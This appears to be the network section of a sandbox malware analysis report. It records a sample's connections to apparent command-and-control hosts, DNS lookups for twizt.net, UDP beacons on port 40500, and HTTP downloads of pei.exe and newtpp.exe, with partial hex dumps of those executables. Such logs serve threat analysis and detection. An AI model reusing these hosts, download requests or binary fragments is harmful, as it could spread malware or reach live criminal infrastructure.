Oct 26, 2024 07:28:07.939332008 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:08.095463991 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:08.095568895 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:11.166975975 CEST	50001	40500	192.168.2.7	185.71.152.222
Oct 26, 2024 07:28:11.172509909 CEST	40500	50001	185.71.152.222	192.168.2.7
Oct 26, 2024 07:28:11.172581911 CEST	50001	40500	192.168.2.7	185.71.152.222
Oct 26, 2024 07:28:11.174235106 CEST	50001	40500	192.168.2.7	185.71.152.222
Oct 26, 2024 07:28:11.179507971 CEST	40500	50001	185.71.152.222	192.168.2.7
Oct 26, 2024 07:28:11.179554939 CEST	50001	40500	192.168.2.7	185.71.152.222
Oct 26, 2024 07:28:11.184864998 CEST	40500	50001	185.71.152.222	192.168.2.7
Oct 26, 2024 07:28:12.320537090 CEST	50001	40500	192.168.2.7	185.71.152.222
Oct 26, 2024 07:28:12.369160891 CEST	40500	50001	185.71.152.222	192.168.2.7
Oct 26, 2024 07:28:14.777776957 CEST	5152	49999	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:14.902662992 CEST	49999	5152	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:15.716005087 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:15.721379995 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:15.721462965 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:15.729418993 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:15.734819889 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:16.804843903 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:16.804924965 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:17.447047949 CEST	50003	40500	192.168.2.7	5.235.173.196
Oct 26, 2024 07:28:17.453329086 CEST	40500	50003	5.235.173.196	192.168.2.7
Oct 26, 2024 07:28:17.453403950 CEST	50003	40500	192.168.2.7	5.235.173.196
Oct 26, 2024 07:28:17.455003023 CEST	50003	40500	192.168.2.7	5.235.173.196
Oct 26, 2024 07:28:17.463026047 CEST	40500	50003	5.235.173.196	192.168.2.7
Oct 26, 2024 07:28:17.463095903 CEST	50003	40500	192.168.2.7	5.235.173.196
Oct 26, 2024 07:28:17.468609095 CEST	40500	50003	5.235.173.196	192.168.2.7
Oct 26, 2024 07:28:18.951001883 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:18.956521034 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:19.244369984 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:19.244467020 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:19.650253057 CEST	40500	50001	185.71.152.222	192.168.2.7
Oct 26, 2024 07:28:19.650311947 CEST	50001	40500	192.168.2.7	185.71.152.222
Oct 26, 2024 07:28:21.412683010 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:21.418104887 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:21.708709002 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:21.708823919 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:22.200725079 CEST	50003	40500	192.168.2.7	5.235.173.196
Oct 26, 2024 07:28:22.247473001 CEST	40500	50003	5.235.173.196	192.168.2.7
Oct 26, 2024 07:28:23.748106956 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:23.753582954 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:24.042301893 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:24.042372942 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:24.748557091 CEST	5152	49999	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:24.793288946 CEST	49999	5152	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:25.937339067 CEST	40500	50003	5.235.173.196	192.168.2.7
Oct 26, 2024 07:28:25.937558889 CEST	50003	40500	192.168.2.7	5.235.173.196
Oct 26, 2024 07:28:26.121047974 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:26.127999067 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:26.416441917 CEST	80	50002	91.202.233.141	192.168.2.7
Oct 26, 2024 07:28:26.416522980 CEST	50002	80	192.168.2.7	91.202.233.141
Oct 26, 2024 07:28:27.658370018 CEST	50004	40500	192.168.2.7	198.163.193.12
Oct 26, 2024 07:28:27.663908958 CEST	40500	50004	198.163.193.12	192.168.2.7
Oct 26, 2024 07:28:27.664004087 CEST	50004	40500	192.168.2.7	198.163.193.12
Oct 26, 2024 07:28:27.666017056 CEST	50004	40500	192.168.2.7	198.163.193.12
Oct 26, 2024 07:28:27.671397924 CEST	40500	50004	198.163.193.12	192.168.2.7
Oct 26, 2024 07:28:27.671473026 CEST	50004	40500	192.168.2.7	198.163.193.12
Oct 26, 2024 07:28:27.676803112 CEST	40500	50004	198.163.193.12	192.168.2.7
Oct 26, 2024 07:28:27.793375015 CEST	50004	40500	192.168.2.7	198.163.193.12
Oct 26, 2024 07:28:27.843604088 CEST	40500	50004	198.163.193.12	192.168.2.7
Oct 26, 2024 07:28:28.364562035 CEST	40500	50004	198.163.193.12	192.168.2.7
Oct 26, 2024 07:28:28.364638090 CEST	50004	40500	192.168.2.7	198.163.193.12
Oct 26, 2024 07:28:29.813456059 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:29.813693047 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:29.819902897 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:29.819979906 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:29.820208073 CEST	80	50000	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:29.820259094 CEST	50000	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:29.820270061 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:29.826508045 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988163948 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988200903 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988217115 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988234043 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988249063 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988248110 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:30.988265038 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988284111 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988296986 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:30.988300085 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988315105 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988322973 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:30.988331079 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.988353968 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:30.988387108 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:30.993861914 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.993875980 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:30.993952036 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.146928072 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147047043 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147087097 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.147104979 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147128105 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.147155046 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.147161007 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147198915 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147250891 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.147275925 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147351027 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147360086 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.147402048 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147408009 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.147434950 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147458076 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.147469997 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.147496939 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.147519112 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.148390055 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.148423910 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.148447990 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.148458958 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.148473978 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.148492098 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.148511887 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.148528099 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.148545980 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.148580074 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.149085999 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.149163008 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.149216890 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.149223089 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.149250031 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.149282932 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.149283886 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.149308920 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.149344921 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.149991035 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.150027037 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.150060892 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.150080919 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.152636051 CEST	80	50005	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:31.152910948 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.276588917 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:31.276659966 CEST	50005	80	192.168.2.7	185.215.113.66
Oct 26, 2024 07:28:34.729221106 CEST	5152	49999	185.215.113.66	192.168.2.7
Oct 26, 2024 07:28:34.902704954 CEST	49999	5152	192.168.2.7	185.215.113.66

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 26, 2024 07:26:29.149666071 CEST	49258	53	192.168.2.7	1.1.1.1
Oct 26, 2024 07:26:29.162231922 CEST	53	49258	1.1.1.1	192.168.2.7
Oct 26, 2024 07:26:43.729077101 CEST	56959	40500	192.168.2.7	87.237.236.86
Oct 26, 2024 07:26:48.717329979 CEST	56959	40500	192.168.2.7	185.203.237.213
Oct 26, 2024 07:26:53.717070103 CEST	56959	40500	192.168.2.7	175.107.23.112
Oct 26, 2024 07:26:58.943016052 CEST	56959	40500	192.168.2.7	146.70.53.161
Oct 26, 2024 07:27:03.935506105 CEST	56959	40500	192.168.2.7	5.234.49.217
Oct 26, 2024 07:27:08.951807022 CEST	56959	40500	192.168.2.7	95.59.62.94
Oct 26, 2024 07:27:13.967750072 CEST	56959	40500	192.168.2.7	2.179.178.50
Oct 26, 2024 07:27:18.967050076 CEST	56959	40500	192.168.2.7	195.158.16.52
Oct 26, 2024 07:27:34.113950968 CEST	65303	40500	192.168.2.7	217.24.149.46
Oct 26, 2024 07:27:39.108007908 CEST	65303	40500	192.168.2.7	88.204.217.130
Oct 26, 2024 07:27:44.123347044 CEST	65303	40500	192.168.2.7	90.156.162.79
Oct 26, 2024 07:27:49.142537117 CEST	65303	40500	192.168.2.7	175.107.23.112
Oct 26, 2024 07:27:54.155419111 CEST	65303	40500	192.168.2.7	185.71.152.222
Oct 26, 2024 07:27:59.162326097 CEST	65303	40500	192.168.2.7	213.230.67.151
Oct 26, 2024 07:27:59.288611889 CEST	57162	53	192.168.2.7	1.1.1.1
Oct 26, 2024 07:27:59.299354076 CEST	53	57162	1.1.1.1	192.168.2.7
Oct 26, 2024 07:28:04.201234102 CEST	65303	40500	192.168.2.7	124.109.48.132
Oct 26, 2024 07:28:09.215116978 CEST	65303	40500	192.168.2.7	213.206.50.15
Oct 26, 2024 07:28:14.218368053 CEST	65303	40500	192.168.2.7	109.165.55.243
Oct 26, 2024 07:28:19.256593943 CEST	65303	40500	192.168.2.7	175.106.46.94
Oct 26, 2024 07:28:24.271475077 CEST	65303	40500	192.168.2.7	195.190.112.66
Oct 26, 2024 07:28:29.267067909 CEST	65303	40500	192.168.2.7	87.237.236.86

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 26, 2024 07:26:29.149666071 CEST	192.168.2.7	1.1.1.1	0xdcd5	Standard query (0)	twizt.net	A (IP address)	IN (0x0001)	false
Oct 26, 2024 07:27:59.288611889 CEST	192.168.2.7	1.1.1.1	0x32db	Standard query (0)	twizthash.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 26, 2024 07:26:29.162231922 CEST	1.1.1.1	192.168.2.7	0xdcd5	No error (0)	twizt.net		185.215.113.66	A (IP address)	IN (0x0001)	false
Oct 26, 2024 07:27:59.299354076 CEST	1.1.1.1	192.168.2.7	0x32db	No error (0)	twizthash.net		185.215.113.66	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

185.215.113.66

twizt.net

185.215.113.84

91.202.233.141

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49714	185.215.113.66	80	7320	C:\Users\user\Desktop\T52Z708x2p.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:26:26.025755882 CEST	301	OUT	GET /pei.exe HTTP/1.1 Accept: / UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 185.215.113.66 Connection: Keep-Alive
Oct 26, 2024 07:26:26.938110113 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:26:26 GMT Content-Type: application/octet-stream Content-Length: 9728 Last-Modified: Wed, 15 May 2024 14:33:59 GMT Connection: keep-alive ETag: "6644c7d7-2600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 64 0e 23 23 05 60 70 23 05 60 70 23 05 60 70 2a 7d f3 70 21 05 60 70 2a 7d f5 70 22 05 60 70 2a 7d e3 70 36 05 60 70 04 c3 1b 70 28 05 60 70 23 05 61 70 18 05 60 70 2a 7d e4 70 20 05 60 70 2a 7d f1 70 22 05 60 70 52 69 63 68 23 05 60 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 b8 c7 44 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 0e 00 00 00 14 00 00 00 00 00 00 19 17 00 00 00 10 00 00 00 20 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 00 00 00 04 00 00 3f d4 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$gd##`p#`p#`p}p!`p}p"`p}p6`pp(`p#ap`p}p `p*}p"`pRich#`pPELDf @`?@l$@P#@ .textz `.rdata4 @@.data0@.rsrc@ @@.relocP$@B
Oct 26, 2024 07:26:26.938183069 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 83 ec 54 6a 44 8d 44 24 14 6a 00 50 e8 eb 03 00 00 83 c4 0c 33 c0 8d 14 24 52 89 44 24 04 Data Ascii: TjDD$jP3$RD$D$D$D$D$Pjjj jjfL$\L$tjQjD$8DD$d @uh$ @T2T,SUV @Psh$4Ph !@D$ @H
Oct 26, 2024 07:26:26.938219070 CEST	224	IN	Data Raw: 18 3b c6 75 07 33 f6 46 8b de eb 10 68 e8 03 00 00 ff 15 24 20 40 00 eb da 33 f6 46 a1 78 33 40 00 3b c6 75 0a 6a 1f e8 a8 02 00 00 59 eb 2f a1 78 33 40 00 85 c0 75 20 89 35 78 33 40 00 68 1c 21 40 00 68 10 21 40 00 e8 f7 04 00 00 59 59 85 c0 74 Data Ascii: ;u3Fh$ @3Fx3@;ujY/x3@u 5x3@h!@h!@YYt.540@x3@;uh!@h!@YYx3@uSWL @=3@th3@Ytjjj3@ @0u< wLt}uBt< wFuE
Oct 26, 2024 07:26:26.938250065 CEST	1236	IN	Data Raw: 74 06 0f b7 45 c8 eb 03 6a 0a 58 50 56 6a 00 68 00 00 40 00 e8 37 fe ff ff a3 30 30 40 00 83 3d 24 30 40 00 00 75 5b 50 ff 15 9c 20 40 00 3c 22 75 0b 33 c9 39 4d e4 0f 94 c1 89 4d e4 0f b6 c0 50 ff 15 a0 20 40 00 59 85 c0 74 04 46 89 75 e0 46 eb Data Ascii: tEjXPVjh@700@=$0@u[P @<"u39MMP @YtFuFEMPQYYeE00@=$0@uP @=40@u @E00@3@eEMZf9@t3M<@@8PEuHtu
Oct 26, 2024 07:26:26.938298941 CEST	1236	IN	Data Raw: 75 08 68 46 1b 40 00 68 10 30 40 00 e8 f1 00 00 00 83 c4 18 5d c3 8b ff 56 68 00 00 03 00 68 00 00 01 00 33 f6 56 e8 e3 00 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 cc 00 00 00 83 c4 14 5e c3 33 c0 c3 8b ff 55 8b ec 83 ec 10 a1 10 30 40 00 83 Data Ascii: uhF@h0@]Vhh3VtVVVVV^3U0@eeSWN@;tt0@`VEP4 @u3u0 @3, @3 @3EP( @E3E3;uO@u50@50@^_[%X @%\ @% @%d @;
Oct 26, 2024 07:26:26.938343048 CEST	1236	IN	Data Raw: 70 00 25 00 00 00 00 00 25 00 73 00 5c 00 25 00 64 00 25 00 64 00 2e 00 65 00 78 00 65 00 00 00 4d 00 6f 00 7a 00 69 00 6c 00 6c 00 61 00 2f 00 35 00 2e 00 30 00 20 00 28 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 4e 00 54 00 20 00 31 00 Data Ascii: p%%s\%d%d.exeMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safa
Oct 26, 2024 07:26:26.938378096 CEST	336	IN	Data Raw: 45 00 50 61 74 68 46 69 6c 65 45 78 69 73 74 73 57 00 53 48 4c 57 41 50 49 2e 64 6c 6c 00 2a 05 6d 65 6d 73 65 74 00 00 38 05 72 61 6e 64 00 00 49 05 73 72 61 6e 64 00 4d 53 56 43 52 39 30 2e 64 6c 6c 00 15 01 5f 61 6d 73 67 5f 65 78 69 74 00 00 Data Ascii: EPathFileExistsWSHLWAPI.dll*memset8randIsrandMSVCR90.dll_amsg_exit__getmainargs,_cexit\|_exitf_XcptFilter%_ismbbleadexit_acmdln_initterm_initterm_e<_configthreadlocale__setusermatherr_adjust_fdi
Oct 26, 2024 07:26:26.938412905 CEST	1236	IN	Data Raw: 6e 6c 6f 63 6b 00 96 00 5f 5f 64 6c 6c 6f 6e 65 78 69 74 00 76 02 5f 6c 6f 63 6b 00 1c 03 5f 6f 6e 65 78 69 74 00 60 01 5f 64 65 63 6f 64 65 5f 70 6f 69 6e 74 65 72 00 73 01 5f 65 78 63 65 70 74 5f 68 61 6e 64 6c 65 72 34 5f 63 6f 6d 6d 6f 6e 00 Data Ascii: nlock__dllonexitv_lock_onexit`_decode_pointers_except_handler4_common_invoke_watson?_controlfp_sK_crt_debugger_hookjInternetCloseHandleInternetReadFileInternetOpenUrlWInternetOpenWInternetOpenUrlAInter
Oct 26, 2024 07:26:26.938513994 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2024 07:26:26.938550949 CEST	424	IN	Data Raw: 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e 47 58 58 50 41 44 44 49 4e 47 50 41 44 44 49 4e Data Ascii: INGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDING
Oct 26, 2024 07:26:26.944076061 CEST	356	IN	Data Raw: 9a 35 a0 35 aa 35 c3 35 ee 35 f4 35 fe 35 04 36 0d 36 19 36 40 36 4b 36 51 36 9a 36 a0 36 a8 36 af 36 b4 36 ba 36 c0 36 c8 36 ce 36 d5 36 dc 36 ec 36 f4 36 fa 36 06 37 11 37 66 37 6c 37 76 37 7d 37 88 37 8e 37 a2 37 b7 37 c2 37 da 37 f0 37 fd 37 Data Ascii: 5555555666@6K6Q66666666666666677f7l7v7}777777777:8?8`8e88(9-9?9]9q9w9999:W:\::::::::;%;0;6;<;B;H;X;^;d;t;z;;;;;;;;;;;;;;;;;;;<<<%<*<:<?<E<K<a<h<p<v< $11133334 4(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49732	185.215.113.66	80	7504	C:\Users\user\AppData\Local\Temp\70AF.exe

Timestamp	Bytes transferred	Direction	Data
Oct 26, 2024 07:26:29.173016071 CEST	174	OUT	GET /newtpp.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Host: twizt.net
Oct 26, 2024 07:26:30.080782890 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 26 Oct 2024 05:26:29 GMT Content-Type: application/octet-stream Content-Length: 85504 Last-Modified: Thu, 10 Oct 2024 07:41:50 GMT Connection: keep-alive ETag: "6707853e-14e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$mpj)9)9)9 9.9Q8+9C9+9A9(99+9s9-9)99e9<9 9-9 959 9(9Rich)9PELgp@y@p\|0.text `.rdata?@@@.data.@2@
Oct 26, 2024 07:26:30.080817938 CEST	112	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b 6c 24 08 8b 45 20 56 33 f6 57 8b 7c 24 20 85 c0 74 1c 8b 4f 04 39 08 75 0a 66 Data Ascii: Ul$E V3W\|$ tO9ufPf;Wt@uu"j
Oct 26, 2024 07:26:30.080832958 CEST	1236	IN	Data Raw: 00 8b f0 8b 47 04 89 06 66 8b 4f 02 66 89 4e 04 8b 55 20 89 56 1c 83 c4 04 89 75 20 e8 c5 ce 00 00 8b 4c 24 14 8b 7c 24 18 89 46 08 8b 44 24 1c 50 51 e8 0f 05 00 00 83 c4 08 84 c0 74 75 53 8d a4 24 00 00 00 00 8b 4e 0c 83 f9 04 72 64 8b 46 18 8b Data Ascii: GfOfNU Vu L$\|$FD$PQtuS$NrdF;wX}xttSWTAuD$$MPSWUNxF;uF+tP9RQA)~[_^]USV3W}\$OD$Phf@QD$
Oct 26, 2024 07:26:30.080849886 CEST	1236	IN	Data Raw: 6a 01 8d 54 24 28 52 6a 04 66 89 44 24 1a c6 44 24 30 01 8b 46 08 68 ff ff 00 00 50 ff 15 18 02 41 00 8b 56 08 6a 10 8d 4c 24 10 51 52 ff 15 1c 02 41 00 83 f8 ff 75 12 56 e8 e4 fd ff ff 83 c4 04 5e 5b 33 c0 5f 83 c4 10 c3 6a 00 6a 00 56 68 00 11 Data Ascii: jT$(RjfD$D$0FhPAVjL$QRAuV^[3_jjVh@jj^AF^[_FS2Ul$;FvNPQFFFT$FWRP~;uF;vu]F[Ft;r+F][+n][W
Oct 26, 2024 07:26:30.080868006 CEST	1236	IN	Data Raw: 3e 69 6c 63 69 75 07 8b c6 e8 00 03 00 00 8b 3d 34 01 41 00 ff d7 8b 74 24 0c 2b c6 3d e8 03 00 00 72 3e 8d 73 20 56 ff 15 f4 00 41 00 8b 7b 38 85 ff 74 24 83 bf 60 02 00 00 ff 74 16 8b bf 80 02 00 00 85 ff 75 ed 56 ff 15 f8 00 41 00 e9 80 00 00 Data Ascii: >ilciu=4At$+=r>s VA{8t$`tuVAVAr+='rgC PAs8tBjVRXA+r`tPf`uC PA4AD$CjP`A_^[]
